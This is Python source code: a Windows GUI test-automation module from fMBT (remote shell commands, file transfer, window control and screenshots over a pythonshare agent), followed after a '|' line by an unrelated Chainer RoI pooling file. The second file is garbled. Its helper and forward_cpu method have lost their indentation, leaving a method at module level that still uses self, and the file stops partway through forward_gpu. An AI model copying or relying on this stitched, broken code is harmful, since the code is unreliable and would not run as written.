    "VK_END", "VK_HOME", "VK_LEFT", "VK_UP", "VK_RIGHT", "VK_DOWN",
    "VK_SELECT", "VK_PRINT", "VK_EXECUTE", "VK_SNAPSHOT", "VK_INSERT",
    "VK_DELETE", "VK_HELP", "VK_LWIN", "VK_RWIN", "VK_APPS", "VK_SLEEP",
    "VK_NUMPAD0", "VK_NUMPAD1", "VK_NUMPAD2", "VK_NUMPAD3", "VK_NUMPAD4",
    "VK_NUMPAD5", "VK_NUMPAD6", "VK_NUMPAD7", "VK_NUMPAD8", "VK_NUMPAD9",
    "VK_MULTIPLY", "VK_ADD", "VK_SEPARATOR", "VK_SUBTRACT", "VK_DECIMAL",
    "VK_DIVIDE", "VK_F1", "VK_F2", "VK_F3", "VK_F4", "VK_F5", "VK_F6",
    "VK_F7", "VK_F8", "VK_F9", "VK_F10", "VK_F11", "VK_F12", "VK_F13",
    "VK_F14", "VK_F15", "VK_F16", "VK_F17", "VK_F18", "VK_F19", "VK_F20",
    "VK_F21", "VK_F22", "VK_F23", "VK_F24", "VK_NUMLOCK", "VK_SCROLL",
    "VK_LSHIFT", "VK_RSHIFT", "VK_LCONTROL", "VK_RCONTROL", "VK_LMENU",
    "VK_RMENU", "VK_BROWSER_BACK", "VK_BROWSER_FORWARD",
    "VK_BROWSER_REFRESH", "VK_BROWSER_STOP", "VK_BROWSER_SEARCH",
    "VK_BROWSER_FAVORITES", "VK_BROWSER_HOME", "VK_VOLUME_MUTE",
    "VK_VOLUME_DOWN", "VK_VOLUME_UP", "VK_MEDIA_NEXT_TRACK",
    "VK_MEDIA_PREV_TRACK", "VK_MEDIA_STOP", "VK_MEDIA_PLAY_PAUSE",
    "VK_LAUNCH_MAIL", "VK_LAUNCH_MEDIA_SELECT", "VK_LAUNCH_APP1",
    "VK_LAUNCH_APP2", "VK_OEM_1", "VK_OEM_PLUS", "VK_OEM_COMMA",
    "VK_OEM_MINUS", "VK_OEM_PERIOD", "VK_OEM_2", "VK_OEM_3", "VK_OEM_4",
    "VK_OEM_5", "VK_OEM_6", "VK_OEM_7", "VK_OEM_8", "VK_OEM_102",
    "VK_PROCESSKEY", "VK_PACKET", "VK_ATTN", "VK_CRSEL", "VK_EXSEL",
    "VK_EREOF", "VK_PLAY", "VK_ZOOM", "VK_PA1", "VK_OEM_CLEAR", "0", "1",
    "2", "3", "4", "5", "6", "7", "8", "9", "A", "B", "C", "D", "E", "F",
    "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T",
    "U", "V", "W", "X", "Y", "Z"]
# ShowWindow showCmd constants (user32.ShowWindow nCmdShow values);
# _g_showCmds maps each name to its value via its list index.
SW_HIDE = 0
SW_NORMAL = 1
SW_MINIMIZED = 2
SW_MAXIMIZE = 3
SW_NOACTIVATE = 4
SW_SHOW = 5
SW_MINIMIZE = 6
SW_MINNOACTIVE = 7
SW_SHOWNA = 8
SW_RESTORE = 9
SW_DEFAULT = 10
SW_FORCEMINIMIZE = 11
_g_showCmds = [
    "SW_HIDE", "SW_NORMAL", "SW_MINIMIZED", "SW_MAXIMIZE", "SW_NOACTIVATE",
    "SW_SHOW", "SW_MINIMIZE", "SW_MINNOACTIVE", "SW_SHOWNA", "SW_RESTORE",
    "SW_DEFAULT", "SW_FORCEMINIMIZE"]
class ViewItem(fmbtgti.GUIItem):
    """One widget in a dumped window view, linked to its View."""
    def __init__(self, view, itemId, parentId, className, text, bbox, dumpFilename):
        self._view = view
        self._itemId = itemId
        self._parentId = parentId
        self._className = className
        self._text = text
        fmbtgti.GUIItem.__init__(self, self._className, bbox, dumpFilename)
    def children(self):
        """Return this item's child ViewItems, in dump order."""
        childInfos = self._view._itemTree[self._itemId]
        return [self._view._viewItems[info[0]] for info in childInfos]
    def __str__(self):
        return "ViewItem(%s)" % (self._view._dumpItem(self),)
class View(object):
    """Parsed dump of a window's widget hierarchy.

    itemTree maps an item id (or "root") to a list of
    (itemId, parentId, className, text, bbox) tuples; each tuple is
    materialized as a ViewItem.
    """
    def __init__(self, dumpFilename, itemTree):
        self._dumpFilename = dumpFilename
        self._itemTree = itemTree
        self._viewItems = {}
        for itemId, winfoList in itemTree.iteritems():
            for winfo in winfoList:
                itemId, parentId, className, text, bbox = winfo
                self._viewItems[itemId] = ViewItem(
                    self, itemId, parentId, className, text, bbox, dumpFilename)
    def _intCoords(self, *args):
        # TODO: relative coordinates like (0.5, 0.9)
        return [int(c) for c in args[0]]
    def rootItem(self):
        """Return the root ViewItem of the hierarchy."""
        return self._viewItems[self._itemTree["root"][0][0]]
    def _dumpItem(self, viewItem):
        # One-line textual summary of a single item.
        return "id=%s cls=%s text=%s bbox=%s" % (
            viewItem._itemId, repr(viewItem._className), repr(viewItem._text),
            viewItem._bbox)
    def _dumpTree(self, rootItem, depth=0):
        # Depth-first dump, indenting four spaces per level.
        l = ["%s%s" % (" " * (depth * 4), self._dumpItem(rootItem))]
        for child in rootItem.children():
            l.extend(self._dumpTree(child, depth+1))
        return l
    def dumpTree(self, rootItem=None):
        """
        Returns item tree as a string
        """
        if rootItem == None:
            rootItem = self.rootItem()
        return "\n".join(self._dumpTree(rootItem))
    def __str__(self):
        return "View(%s, %s items)" % (repr(self._dumpFilename), len(self._viewItems))
    def findItems(self, comparator, count=-1, searchRootItem=None, searchItems=None):
        """Return up to count items for which comparator(item) is true.

        count < 0 means unlimited. Search either the subtree under
        searchRootItem, the explicit searchItems collection, or all
        items of the view.
        """
        foundItems = []
        if count == 0: return foundItems
        if searchRootItem != None:
            if comparator(searchRootItem):
                foundItems.append(searchRootItem)
            # NOTE: recursion may slightly overshoot count; callers treat
            # count as an upper bound per subtree.
            for c in searchRootItem.children():
                foundItems.extend(self.findItems(comparator, count=count-len(foundItems), searchRootItem=c))
        else:
            if searchItems:
                # BUG FIX: "domain" is called below, but the original code
                # assigned iter(searchItems) here, so domain() raised
                # TypeError ("iterator is not callable"). Wrap it in a
                # lambda so each call yields a fresh iterator.
                domain = lambda: iter(searchItems)
            else:
                domain = self._viewItems.itervalues
            for i in domain():
                if comparator(i):
                    foundItems.append(i)
                if count > 0 and len(foundItems) >= count:
                    break
        return foundItems
    def findItemsByText(self, text, partial=False, count=-1, searchRootItem=None, searchItems=None):
        """Find items by exact (or, with partial=True, substring) text."""
        if partial:
            c = lambda item: (text in item._text)
        else:
            c = lambda item: (text == item._text)
        return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
    def findItemsByClass(self, className, partial=False, count=-1, searchRootItem=None, searchItems=None):
        """Find items by exact (or, with partial=True, substring) class name."""
        if partial:
            c = lambda item: (className in item._className)
        else:
            c = lambda item: (className == item._className)
        return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
    def findItemsByPos(self, pos, count=-1, searchRootItem=None, searchItems=None, onScreen=None):
        """
        Returns list of ViewItems whose bounding box contains the position.

        Parameters:
          pos (pair of floats (0.0..0.1) or integers (x, y)):
                  coordinates that fall in the bounding box of found items.
          other parameters: refer to findItems documentation.

        Items are listed in ascending order based on area. They may
        or may not be from the same branch in the widget hierarchy.
        """
        x, y = self._intCoords(pos)
        c = lambda item: (item.bbox()[0] <= x <= item.bbox()[2] and item.bbox()[1] <= y <= item.bbox()[3])
        items = self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
        # sort from smallest to greatest area
        area_items = [((i.bbox()[2] - i.bbox()[0]) * (i.bbox()[3] - i.bbox()[1]), i) for i in items]
        return [i for _, i in sorted(area_items)]
    def save(self, fileOrDirName):
        """
        Save view dump to a file.
        """
        shutil.copy(self._dumpFilename, fileOrDirName)
class Device(fmbtgti.GUITestInterface):
    # fMBT GUI test interface for a Windows device, driven remotely over a
    # pythonshare connection (see WindowsConnection below).
    def __init__(self, connspec, password=None, screenshotSize=(None, None), **kwargs):
        """Connect to windows device under test.

        Parameters:
          connspec (string):
                  specification for connecting to a pythonshare
                  server that will run fmbtwindows-agent. The format is
                  "socket://<host>[:<port>]".
          password (optional, string or None):
                  authenticate to pythonshare server with given
                  password. The default is None (no authentication).
          rotateScreenshot (integer, optional)
                  rotate new screenshots by rotateScreenshot degrees.
                  Example: rotateScreenshot=-90. The default is 0 (no
                  rotation).

        To prepare a windows device for connection, launch there

        python pythonshare-server --password mysecretpwd

        When not on trusted network, consider ssh port forward, for
        instance.
        """
        # NOTE(review): the screenshotSize parameter is accepted but not
        # referenced in this constructor — confirm whether it should be
        # forwarded to the connection's setScreenshotSize().
        fmbtgti.GUITestInterface.__init__(self, **kwargs)
        self.setConnection(WindowsConnection(connspec, password))
    def existingView(self):
        # Return the latest refreshed view or fail loudly if none exists.
        if self._lastView:
            return self._lastView
        else:
            raise FMBTWindowsError("view is not available. Missing refreshView()?")
    def getFile(self, remoteFilename, localFilename=None):
        """
        Fetch file from the device.

        Parameters:
          remoteFilename (string):
                  file to be fetched on device
          localFilename (optional, string or None):
                  file to be saved to local filesystem. If None,
                  return contents of the file without saving them.
        """
        return self._conn.recvFile(remoteFilename, localFilename)
    def getMatchingPaths(self, pathnamePattern):
        """
        Returns list of paths matching pathnamePattern on the device.

        Parameters:
          pathnamePattern (string):
                  Pattern for matching files and directories on the device.

        Example:
          getMatchingPaths("c:/windows/*.ini")

        Implementation runs glob.glob(pathnamePattern) on remote device.
        """
        return self._conn.recvMatchingPaths(pathnamePattern)
    def keyNames(self):
        """
        Returns list of key names recognized by pressKey
        """
        return sorted(_g_keyNames)
    def pinch(self, (x, y), startDistance, endDistance,
              finger1Dir=90, finger2Dir=270, movePoints=20,
              duration=0.75):
        """
        Pinch (open or close) on coordinates (x, y).

        Parameters:
          x, y (integer):
                  the central point of the gesture. Values in range
                  [0.0, 1.0] are scaled to full screen width and
                  height.
          startDistance, endDistance (float):
                  distance from both finger tips to the central point
                  of the gesture, at the start and at the end of the
                  gesture. Values in range [0.0, 1.0] are scaled up to
                  the distance from the coordinates to the edge of the
                  screen. Both finger tips will reach an edge if
                  distance is 1.0.
          finger1Dir, finger2Dir (integer, optional):
                  directions for finger tip movements, in range [0,
                  360]. 0 is to the east, 90 to the north, etc. The
                  defaults are 90 and 270.
          movePoints (integer, optional):
                  number of points to which finger tips are moved
                  after laying them to the initial positions. The
                  default is 20.
          duration (float, optional):
                  duration of the gesture in seconds, the default is 0.75.
        """
        screenWidth, screenHeight = self.screenSize()
        # NOTE(review): screenDiagonal is computed but never used below.
        screenDiagonal = math.sqrt(screenWidth**2 + screenHeight**2)
        if x == None: x = 0.5
        if y == None: y = 0.5
        x, y = self.intCoords((x, y))
        # Relative distances in [0.0, 1.0] are scaled by the larger of the
        # two finger directions' distances to the screen edge.
        if type(startDistance) == float and 0.0 <= startDistance <= 1.0:
            startDistanceInPixels = (startDistance *
                                     max(fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger1Dir),
                                         fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger2Dir)))
        else: startDistanceInPixels = int(startDistance)
        if type(endDistance) == float and 0.0 <= endDistance <= 1.0:
            endDistanceInPixels = (endDistance *
                                   max(fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger1Dir),
                                       fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger2Dir)))
        else: endDistanceInPixels = int(endDistance)
        # Convert polar (direction, distance) into start/end points for
        # both fingers; y axis grows downwards, hence the minus on sin.
        finger1startX = int(x + math.cos(math.radians(finger1Dir)) * startDistanceInPixels)
        finger1startY = int(y - math.sin(math.radians(finger1Dir)) * startDistanceInPixels)
        finger1endX = int(x + math.cos(math.radians(finger1Dir)) * endDistanceInPixels)
        finger1endY = int(y - math.sin(math.radians(finger1Dir)) * endDistanceInPixels)
        finger2startX = int(x + math.cos(math.radians(finger2Dir)) * startDistanceInPixels)
        finger2startY = int(y - math.sin(math.radians(finger2Dir)) * startDistanceInPixels)
        finger2endX = int(x + math.cos(math.radians(finger2Dir)) * endDistanceInPixels)
        finger2endY = int(y - math.sin(math.radians(finger2Dir)) * endDistanceInPixels)
        self.existingConnection().sendPinch(
            (finger1startX, finger1startY), (finger1endX, finger1endY),
            (finger2startX, finger2startY), (finger2endX, finger2endY),
            movePoints, duration)
        return True
    def pinchOpen(self, (x, y) = (0.5, 0.5), startDistance=0.1, endDistance=0.5, **pinchKwArgs):
        """
        Make the open pinch gesture.

        Parameters:
          x, y (integer, optional):
                  the central point of the gesture, the default is in
                  the middle of the screen.
          startDistance, endDistance (float, optional):
                  refer to pinch documentation. The default is 0.1 and
                  0.5.
          for the rest of the parameters, refer to pinch documentation.
        """
        return self.pinch((x, y), startDistance, endDistance, **pinchKwArgs)
    def pinchClose(self, (x, y) = (0.5, 0.5), startDistance=0.5, endDistance=0.1, **pinchKwArgs):
        """
        Make the close pinch gesture.

        Parameters:
          x, y (integer, optional):
                  the central point of the gesture, the default is in
                  the middle of the screen.
          startDistance, endDistance (float, optional):
                  refer to pinch documentation. The default is 0.5 and
                  0.1.
          rest of the parameters: refer to pinch documentation.
        """
        return self.pinch((x, y), startDistance, endDistance, **pinchKwArgs)
    def putFile(self, localFilename, remoteFilepath):
        """
        Send local file to the device

        Parameters:
          localFilename (string):
                  file to be sent.
          remoteFilepath (string):
                  destination on the device. If destination is an
                  existing directory, the file will be saved to the
                  directory with its original name. Otherwise the file
                  will be saved with remoteFilepath as new name.
        """
        return self._conn.sendFile(localFilename, remoteFilepath)
    def refreshView(self, window=None, forcedView=None):
        """
        (Re)reads widgets on the top window and updates the latest view.

        Parameters:
          window (integer (hWnd) or string (title), optional):
                  read widgets from given window instead of the top window.
          forcedView (View or filename, optional):
                  use given View object or view file instead of reading the
                  items from the device.

        Returns View object.
        """
        if forcedView != None:
            if isinstance(forcedView, View):
                self._lastView = forcedView
            elif type(forcedView) in [str, unicode]:
                # Load a previously saved view dump from a file.
                self._lastView = View(forcedView,
                                      ast.literal_eval(file(forcedView).read()))
        else:
            if self.screenshotDir() == None:
                self.setScreenshotDir(self._screenshotDirDefault)
            if self.screenshotSubdir() == None:
                self.setScreenshotSubdir(self._screenshotSubdirDefault)
            # Name the view dump after the next screenshot file, with a
            # "view" suffix instead of the image extension.
            viewFilename = self._newScreenshotFilepath()[:-3] + "view"
            viewData = self._conn.recvViewData(window)
            file(viewFilename, "w").write(repr(viewData))
            self._lastView = View(viewFilename, viewData)
        return self._lastView
    def setDisplaySize(self, size):
        """
        Transform coordinates of synthesized events (like a tap) from
        screenshot resolution to display input area size. By default
        events are synthesized directly to screenshot coordinates.

        Parameters:
          size (pair of integers: (width, height)):
                  width and height of display in pixels. If not given,
                  values from EnumDisplayMonitors are used.

        Returns None.
        """
        width, height = size
        screenWidth, screenHeight = self.screenSize()
        self._conn.setScreenToDisplayCoords(
            lambda x, y: (x * width / screenWidth,
                          y * height / screenHeight))
        self._conn.setDisplayToScreenCoords(
            lambda x, y: (x * screenWidth / width,
                          y * screenHeight / height))
    def setForegroundWindow(self, window):
        """
        Set a window with the title as a foreground window

        Parameters:
          window (title (string) or hwnd (integer):
                  title or handle of the window to be raised
                  foreground.

        Returns True if the window was brought to the foreground,
        otherwise False.

        Notes: calls SetForegroundWindow in user32.dll.
        """
        return self.existingConnection().sendSetForegroundWindow(window)
    def setScreenshotSize(self, size):
        """
        Force screenshots from device to use given resolution.
        Overrides detected monitor resolution on device.

        Parameters:
          size (pair of integers: (width, height)):
                  width and height of screenshot.
        """
        self._conn.setScreenshotSize(size)
    def shell(self, command):
        """
        Execute command in Windows.

        Parameters:
          command (string or list of strings):
                  command to be executed. Will be forwarded directly
                  to subprocess.check_output. If command is a string,
                  then it will be executed in subshell, otherwise without
                  shell.

        Returns what is printed by the command.

        If you wish to receive exitstatus or standard output and error
        separated from command, refer to shellSOE().
        """
        return self._conn.evalPython('shell(%s)' % (repr(command),))
    def shellSOE(self, command, asyncStatus=None, asyncOut=None, asyncError=None):
        """
        Execute command on Windows.

        Parameters:
          command (string or list of strings):
                  command to be executed. If command is a list of
                  string, it will be executed without shell
                  (subprocess.check_output with shell=False).
                  If command is a single-line string, it will be
                  executed in shell (subprocess.check_output with
                  shell=True).
                  If command is a multiline string, it will be written
                  to a BAT file and executed as a script.
          asyncStatus (string or None)
                  filename (on device) to which the status of
                  asynchronously executed shellCommand will be
                  written. The default is None, that is, command will
                  be run synchronously, and status will be returned in
                  the tuple.
          asyncOut (string or None)
                  filename (on device) to which the standard output of
                  asynchronously executed shellCommand will be
                  written. The default is None.
          asyncError (string or None)
                  filename (on device) to which the standard error of
                  asynchronously executed shellCommand will be
                  written. The default is None.

        Returns triplet: exit status, standard output and standard error
        from the command.

        If executing command fails, returns None, None, None.
        """
        return self._conn.evalPython(
            'shellSOE(%s, asyncStatus=%s, asyncOut=%s, asyncError=%s)'
            % (repr(command),
               repr(asyncStatus), repr(asyncOut), repr(asyncError)))
    def showWindow(self, window, showCmd=SW_NORMAL):
        """
        Send showCmd to window.

        Parameters:
          window (window title (string) or handle (integer)):
                  window to which the command will be sent.
          showCmd (integer or string):
                  command to be sent. Valid commands are 0..11:
                  SW_HIDE, SW_NORMAL, SW_MINIMIZED, SW_MAXIMIZE,
                  SW_NOACTIVATE, SW_SHOW SW_MINIMIZE, SW_MINNOACTIVE,
                  SW_SHOWNA, SW_RESTORE, SW_DEFAULT, SW_FORCEMINIMIZE.

        Returns True if the window was previously visible,
        otherwise False.

        Notes: calls ShowWindow in user32.dll.
        """
        return self.existingConnection().sendShowWindow(window, showCmd)
    def tapText(self, text, partial=False, **tapKwArgs):
        """
        Find an item with given text from the latest view, and tap it.

        Parameters:
          partial (boolean, optional):
                  refer to verifyText documentation. The default is
                  False.
          tapPos (pair of floats (x, y)):
                  refer to tapItem documentation.
          button, long, hold, count, delayBetweenTaps (optional):
                  refer to tap documentation.

        Returns True if successful, otherwise False.
        """
        items = self.existingView().findItemsByText(text, partial=partial, count=1)
        if len(items) == 0: return False
        return self.tapItem(items[0], **tapKwArgs)
    def topWindowProperties(self):
        """
        Return properties of the top window as a dictionary
        """
        return self._conn.recvTopWindowProperties()
    def verifyText(self, text, partial=False):
        """
        Verify that the last view has at least one item with given
        text.

        Parameters:
          text (string):
                  text to be searched for in items.
          partial (boolean, optional):
                  if True, match items if item text contains given
                  text, otherwise match only if item text is equal to
                  the given text. The default is False (exact match).
        """
        assert self._lastView != None, "View required."
        return self._lastView.findItemsByText(text, partial=partial, count=1) != []
    def windowList(self):
        """
        Return list of properties of windows (dictionaries)

        Example: list window handles and titles:
          for props in d.windowList():
              print props["hwnd"], props["title"]
        """
        return self._conn.recvWindowList()
    def launchHTTPD(self):
        """
        DEPRECATED, will be removed, do not use!
        """
        return self._conn.evalPython("launchHTTPD()")
    def stopHTTPD(self):
        """
        DEPRECATED, will be removed, do not use!
        """
        return self._conn.evalPython("stopHTTPD()")
    def view(self):
        # Latest view, or None if refreshView() has never been called.
        return self._lastView
class WindowsConnection(fmbtgti.GUITestConnection):
    """GUITestConnection that drives a Windows host through a pythonshare
    agent: fmbtwindows_agent.py is uploaded into the agent namespace and
    all input/screenshot operations are evaluated remotely."""
    def __init__(self, connspec, password):
        fmbtgti.GUITestConnection.__init__(self)
        self._screenshotSize = (None, None) # autodetect
        self._agent = pythonshare.connection(connspec, password=password)
        self._agent_ns = self._agent.namespace()
        agentFilename = os.path.join(
            os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))),
            "fmbtwindows_agent.py")
        self._agent.exec_in(self._agent_ns, file(agentFilename).read())
        # By default screenshot coordinates equal display input coordinates.
        self.setScreenToDisplayCoords(lambda x, y: (x, y))
        self.setDisplayToScreenCoords(lambda x, y: (x, y))
    def setScreenshotSize(self, screenshotSize):
        """Force screenshot resolution and rescale input coordinates
        between the forced size and the device's mouse input area."""
        self._screenshotSize = screenshotSize
        screenW, screenH = self._screenshotSize
        inputW, inputH = self._agent.eval_in(self._agent_ns, "_mouse_input_area")
        self.setScreenToDisplayCoords(
            lambda x, y: (x * inputW / screenW, y * inputH / screenH))
        self.setDisplayToScreenCoords(
            lambda x, y: (x * screenW / inputW, y * screenH / inputH))
    def execPython(self, code):
        # Execute statements in the agent namespace (no return value).
        return self._agent.exec_in(self._agent_ns, code)
    def evalPython(self, code):
        # Evaluate an expression in the agent namespace, return its value.
        return self._agent.eval_in(self._agent_ns, code)
    def recvFile(self, remoteFilename, localFilename=None):
        """Fetch a remote file; save to localFilename (returns True) or
        return the file contents when localFilename is None."""
        data = self._agent.eval_in(self._agent_ns, "file(%s, 'rb').read()" % (repr(remoteFilename),))
        if localFilename:
            file(localFilename, "wb").write(data)
            return True
        else:
            return data
    def sendFile(self, localFilename, remoteFilepath):
        """Upload a local file to remoteFilepath on the device."""
        data = file(localFilename).read()
        # base64-encode so binary content survives the repr/eval round trip.
        rv = self.evalPython('saveFile(%s, %s, base64.b64decode(%s))' %
                             (repr(os.path.basename(localFilename)),
                              repr(remoteFilepath),
                              repr(base64.b64encode(data))))
        return rv
    def recvMatchingPaths(self, pathnamePattern):
        """Return remote paths matching pathnamePattern (remote glob)."""
        return self._agent.eval_in(self._agent_ns,
                                   "glob.glob(%s)" % (repr(pathnamePattern),))
    def recvScreenshot(self, filename, screenshotSize=(None, None)):
        """Take a screenshot on the device and write it to filename.

        The agent returns zlib-compressed BGR data; it is converted to
        RGB and written as PNG when fmbtpng is available, otherwise via
        a temporary PPM converted with ImageMagick.
        """
        ppmfilename = filename + ".ppm"
        if screenshotSize == (None, None):
            screenshotSize = self._screenshotSize
        width, height, zdata = self._agent.eval_in(
            self._agent_ns, "screenshotZYBGR(%s)" % (repr(screenshotSize),))
        data = zlib.decompress(zdata)
        fmbtgti.eye4graphics.wbgr2rgb(data, width, height)
        if fmbtpng != None:
            file(filename, "wb").write(
                fmbtpng.raw2png(data, width, height, 8, "RGB"))
        else:
            ppm_header = "P6\n%d %d\n%d\n" % (width, height, 255)
            f = file(filename + ".ppm", "wb")
            f.write(ppm_header)
            f.write(data)
            f.close()
            _run([fmbt_config.imagemagick_convert, ppmfilename, filename], expectedExitStatus=[0])
            os.remove(ppmfilename)
        return True
    def recvTopWindowProperties(self):
        """Return the top window's properties as a dictionary."""
        return self.evalPython("topWindowProperties()")
    def recvViewData(self, window=None):
        """Return the widget dump of the top window, or of the window
        given by handle (int) or title (string)."""
        if window == None:
            rv = self.evalPython("topWindowWidgets()")
        elif isinstance(window, int):
            rv = self.evalPython("windowWidgets(%s)" % (repr(window),))
        elif isinstance(window, str) or isinstance(window, unicode):
            wlist = self.evalPython("windowList()")
            for w in wlist:
                if w["title"] == window:
                    rv = self.evalPython("windowWidgets(%s)" % (repr(w["hwnd"]),))
                    break
            else:
                raise ValueError('no window with title "%s"' % (window,))
        else:
            raise ValueError('illegal window "%s", expected integer or string (hWnd or title)' % (window,))
        return rv
    def recvWindowList(self):
        """Return properties of all windows as a list of dictionaries."""
        return self.evalPython("windowList()")
    def _window2hwnd(self, window):
        """Resolve a window title or handle into a window handle (hwnd)."""
        if isinstance(window, str) or isinstance(window, unicode):
            windowList = self.recvWindowList()
            hwndList = [w["hwnd"] for w in windowList if w["title"] == window]
            if not hwndList:
                # BUG FIX: this error path referenced an undefined name
                # "title", so it raised NameError instead of the intended
                # ValueError; use "window" as everywhere else.
                raise ValueError('no window with title "%s"' % (window,))
            hwnd = hwndList[0]
        elif isinstance(window, int):
            hwnd = window
        else:
            raise ValueError('invalid window "%s", string or integer expected' % (window,))
        return hwnd
    def sendSetForegroundWindow(self, window):
        """Bring window (title or hwnd) to the foreground via user32."""
        hwnd = self._window2hwnd(window)
        return 0 != self.evalPython("ctypes.windll.user32.SetForegroundWindow(%s)" %
                                    (repr(hwnd),))
    def sendShowWindow(self, window, showCmd):
        """Send a ShowWindow command (SW_* name or index) to window."""
        hwnd = self._window2hwnd(window)
        if isinstance(showCmd, str) or isinstance(showCmd, unicode):
            if showCmd in _g_showCmds:
                showCmd = _g_showCmds.index(showCmd)
            else:
                raise ValueError('invalid showCmd: "%s"' % (showCmd,))
        return 0 != self.evalPython("ctypes.windll.user32.ShowWindow(%s, %s)" %
                                    (repr(hwnd), repr(showCmd)))
    def sendType(self, text):
        """Type text as keyboard input."""
        command = 'sendType(%s)' % (repr(text),)
        self._agent.eval_in(self._agent_ns, command)
        return True
    def sendPress(self, keyCode, modifiers=None):
        """Press and release keyCode with an optional modifier list."""
        if modifiers == None:
            command = 'sendKey("%s",[])' % (keyCode,)
        else:
            command = 'sendKey("%s",%s)' % (keyCode, repr(modifiers))
        self._agent.eval_in(self._agent_ns, command)
        return True
    def sendKeyDown(self, keyCode, modifiers=None):
        """Press keyCode down without releasing it."""
        if modifiers == None:
            command = 'sendKeyDown("%s",[])' % (keyCode,)
        else:
            command = 'sendKeyDown("%s",%s)' % (keyCode, repr(modifiers))
        self._agent.eval_in(self._agent_ns, command)
        return True
    def sendKeyUp(self, keyCode, modifiers=None):
        """Release a previously pressed keyCode."""
        if modifiers == None:
            command = 'sendKeyUp("%s",[])' % (keyCode,)
        else:
            command = 'sendKeyUp("%s",%s)' % (keyCode, repr(modifiers))
        self._agent.eval_in(self._agent_ns, command)
        return True
    def sendTap(self, x, y, button=None):
        """Tap at (x, y); with a button, send a mouse click instead."""
        x, y = self._screenToDisplay(x, y)
        if button == None:
            command = "sendTap(%s, %s)" % (x, y)
        else:
            command = "sendClick(%s, %s, %s)" % (x, y, button)
        self._agent.eval_in(self._agent_ns, command)
        return True
    def sendTouchDown(self, x, y, button=None):
        """Touch down at (x, y); with a button, move mouse and press it."""
        x, y = self._screenToDisplay(x, y)
        if button == None:
            command = "sendTouchDown(%s, %s)" % (x, y)
        else:
            command = "(sendMouseMove(%s, %s), sendMouseDown(%s))" % (x, y, button)
        self._agent.eval_in(self._agent_ns, command)
        return True
    def sendTouchMove(self, x, y, button=None):
        """Move the touch (or mouse, with a button) to (x, y)."""
        x, y = self._screenToDisplay(x, y)
        if button == None:
            command = "sendTouchMove(%s, %s)" % (x, y)
        else:
            command = "sendMouseMove(%s, %s, %s)" % (x, y, button)
        self._agent.eval_in(self._agent_ns, command)
        return True
    def sendTouchUp(self, x, y, button=None):
        """Lift the touch (or release the mouse button) at (x, y)."""
        x, y = self._screenToDisplay(x, y)
        if button == None:
            command = "sendTouchUp(%s, %s)" % (x, y)
        else:
            command = "sendMouseUp(%s, %s, %s)" % (x, y, button)
        self._agent.eval_in(self._agent_ns, command)
        return True
    def sendPinch(self, *args):
        """Run a pinch gesture; args go verbatim to the agent's touchPinch."""
        self.evalPython("touchPinch%s" % (args,))
        return True
    def setScreenToDisplayCoords(self, screenToDisplayFunction):
        # Screenshot -> display input coordinate mapping for send* methods.
        self._screenToDisplay = screenToDisplayFunction
    def setDisplayToScreenCoords(self, displayToScreenFunction):
        # Inverse mapping: display input -> screenshot coordinates.
        self._displayToScreen = displayToScreenFunction
class FMBTWindowsError(Exception): pass
|
import numpy
import six
from chainer import cuda
from chainer import function
from chainer.utils import type_check
def _roi_pooling_slice(size, stride, max_size, roi_offset):
start = int(numpy.floor(size * stride))
end = int(numpy.ceil((size + 1) * stride))
start = min(max(start + roi_offset, 0), max_size)
end = min(max(end + roi_offset, 0), max_size)
return slice(start, end), end - start
class ROIPooling2D(function.Function):
    """RoI pooling over a set of 2d planes."""
    def __init__(self, outh, outw, spatial_scale):
        # Output bin grid size and the image-to-feature-map coordinate scale.
        self.outh = outh
        self.outw = outw
        self.spatial_scale = spatial_scale
    def check_type_forward(self, in_types):
        # Two inputs: the float32 feature map x (N, C, H, W) and the
        # float32 ROI array with one 5-element row per ROI (the forward
        # passes unpack each row as (batch_index, xmin, ymin, xmax, ymax)).
        type_check.expect(in_types.size() == 2)
        x_type, roi_type = in_types
        type_check.expect(
            x_type.dtype == numpy.float32,
            x_type.ndim == 4,
            roi_type.dtype == numpy.float32,
            roi_type.ndim == 2,
            roi_type.shape[1] == 5,
        )
def forward_cpu(self, inputs):
bottom_data, bottom_rois = inputs
n_rois, channels, height, width = bottom_data.shape
top_data = numpy.empty((n_rois, channels, self.outh, self.outw),
dtype=numpy.float32)
self.argmax_data = numpy.empty_like(top_data).astype(numpy.int32)
for i_roi in six.moves.range(n_rois):
idx, xmin, ymin, xmax, ymax = bottom_rois[i_roi]
xmin = int(round(xmin * self.spatial_scale))
xmax = int(round(xmax * self.spatial_scale))
ymin = int(round(ymin * self.spatial_scale))
ymax = int(round(ymax * self.spatial_scale))
roi_width = max(xmax - xmin + 1, 1)
roi_height = max(ymax - ymin + 1, 1)
strideh = 1. * roi_height / self.outh
stridew = 1. * roi_width / self.outw
for outh in six.moves.range(self.outh):
sliceh, lenh = _roi_pooling_slice(
outh, strideh, height, ymin)
if sliceh.stop <= sliceh.start:
continue
for outw in six.moves.range(self.outw):
slicew, lenw = _roi_pooling_slice(
outw, stridew, width, xmin)
if slicew.stop <= slicew.start:
continue
roi_data = bottom_data[int(idx), :, sliceh, slicew]\
.reshape(channels, -1)
top_data[i_roi, :, outh, outw] =\
numpy.max(roi_data, axis=1)
# get the max idx respect to feature_maps coordinates
max_idx_slice = numpy.unravel_index(
numpy.argmax(roi_data, axis=1), (lenh, lenw))
max_idx_slice_h = max_idx_slice[0] + sliceh.start
max_idx_slice_w = max_idx_slice[1] + slicew.start
max_idx_slice = max_idx_slice_h * width + max_idx_slice_w
self.argmax_data[i_roi, :, outh, outw] = max_idx_slice
return top_data,
    def forward_gpu(self, inputs):
        """GPU forward: one kernel thread per output element computes the
        max over its ROI bin and stores the argmax for backward."""
        bottom_data, bottom_rois = inputs
        channels, height, width = bottom_data.shape[1:]
        n_rois = bottom_rois.shape[0]
        top_data = cuda.cupy.empty((n_rois, channels, self.outh,
                                    self.outw), dtype=numpy.float32)
        self.argmax_data = cuda.cupy.empty_like(top_data).astype(numpy.int32)
